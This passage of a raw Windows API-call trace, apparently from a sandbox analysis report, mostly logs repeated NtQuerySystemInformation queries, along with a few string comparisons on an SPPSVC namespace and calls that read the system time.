(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd00, Length=0x50, ResultLength=0x0) [0281.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.499] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcce8, Length=0x50, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.506] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.508] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.509] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.510] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.512] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x38, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf70, Length=0x28, ResultLength=0x0) [0281.516] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce60, Length=0x28, ResultLength=0x0) [0281.517] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcee0, Length=0x50, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x28, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fccb0, Length=0x28, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd30, Length=0x28, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc10, Length=0x20, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce10, Length=0x38, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc90, Length=0x20, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.528] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf40 | out: lpSystemTimeAsFileTime=0xf7a68fcf40*(dwLowDateTime=0x3a2a3efb, dwHighDateTime=0x1d63874)) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcff8, Length=0x50, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf30, Length=0x28, ResultLength=0x0) [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce48, Length=0x50, ResultLength=0x0) [0281.529] GetTickCount () returned 0x11867b1 [0281.529] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd18, Length=0x58, ResultLength=0x0) [0281.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.530] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.534] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x28, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x28, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.535] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.538] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb50, Length=0x28, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.539] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x38, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.540] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.541] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 